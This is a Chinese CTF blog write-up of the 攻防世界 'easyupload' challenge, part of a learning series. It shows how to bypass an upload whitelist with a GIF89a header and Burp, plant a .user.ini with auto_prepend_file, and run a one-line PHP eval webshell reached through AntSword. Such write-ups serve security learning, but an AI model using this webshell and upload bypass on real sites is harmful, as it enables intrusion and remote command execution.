CTFer成长记录——CTF之Web专题·攻防世界—easyupload
1.CTFer成长记录——web专题·本地访问网址2.CTFer成长记录——web专题·一句话木马3.CTFer成长记录——Web专题·从cookie中获取信息4.CTFer成长记录——Web专题·双写绕过5.CTFer成长记录——Web专题·robots协议6.CTFer成长记录——Web专题·Linux中的.swp文件7.CTFer成长记录——Web专题·修改页面元素8.CTFer成长记录——Web专题·判断绕过9.CTFer成长记录——CTF之Web专题·初识反序列化10.CTFer成长记录——CTF之Web专题·攻防世界-PHP211. CTFer成长记录——CTF之Web专题·bugku-Simple_SSTI_212.CTFer成长记录——CTF之Web专题·bugku-eval13.CTFer成长记录——CTF之Web专题·bugku-变量114.CTFer成长记录——CTF之Web专题·[ACTF2020 新生赛]Include15. CTFer成长记录——CTF之Web专题·bugku—备份是个好习惯
16.CTFer成长记录——CTF之Web专题·攻防世界—easyupload
17.CTFer成长记录——CTF之Web专题·攻防世界—fileinclude·好多文件呀18.CTFer成长记录——CTF之Web专题·攻防世界—easyphp19. CTFer成长记录——CTF之Web专题·buuctf—secretfile20.CTFer成长记录——CTF之Web专题·19强网杯—随便注21.CTFer成长记录——CTF之Web专题·攻防世界—file_include22.CTFer成长记录——CTF之Web专题·攻防世界—unseping23.CTFer成长记录——CTF之Web专题·攻防世界—NewsCenter24.CTFer成长记录——CTF之Web专题·极客大挑战 2019—http25.CTFer成长记录——CTF之Web专题·极客大挑战—Upload26.CTFer成长记录——CTF之Web专题·极客大挑战—BabySQL27.CTFer成长记录——CTF之Web专题·攻防世界-Web_python_template_injection28.CTFer成长记录——CTF之Web专题·攻防世界-Web_php_unserialize29.CTFer成长记录——CTF之Web专题·攻防世界-php_rce30.CTFer成长记录——CTF之Web专题·攻防世界-Web_php_include31. CTFer成长记录——CTF之Web专题·buuctf-easy_tornado32.CTFer成长记录——CTF之Web专题·攻防世界—lottery33. CTFer成长记录——CTF之Web专题·攻防世界—ics-0534.CTFer成长记录——CTF之Web专题·buuctf—admin35.CTFer成长记录——CTF之Web专题·buuctf—Cookies36. CTFer成长记录——CTF之Web专题·bugku—never_give_up37.CTFer成长记录——CTF之Web专题·[SWPUCTF 2021 新生赛]jicao一、题目链接
https://adworld.xctf.org.cn/challenges/list
二、解法步骤
这题一道文件上传题,本题考的是利用.user.ini文件的特性,实现任意命令执行。在测试该文件上传是白名单还是黑名单,我们可以随便上传一个文件后缀,只要不通过就是白名单检测。
.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。
使用方法:
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。
auto_prepend_file=01.gif //01.gif是你要上传的文件
所以,我们可以借助.user.ini轻松让所有php文件都自动包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。
于是我们将auto_prepend_file=1.jpg
写入一个空的.txt文件中,然后改名改后缀为.user.int,接着将这个文件上传。注意:直接上传是不行的,需要bp抓包,修改请求包中的文件类型,用来绕过白名单检测:注意由于该题会对文件内容进行解析,所以要加上GIF89a这个文件欺骗头,让上传系统误认为我们上传的是图片。
最后显示上传成功。
然后就上传webshell即可:(上传的是1.jpg名称,要和.user.ini中后的文件名相同)
GIF89a //也需要包含文件欺骗头
<?=eval($_POST['cmd']);?>
//注意这里如果是<?php ?> 格式上传也是不成功的。
最后找到文件路径:xxx.uploads/index.php
用蚂剑连接即可:
三、总结
本题的文件上传是新知识,有对.user.ini的利用和一句话木马的格式改写,应当积累下来。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!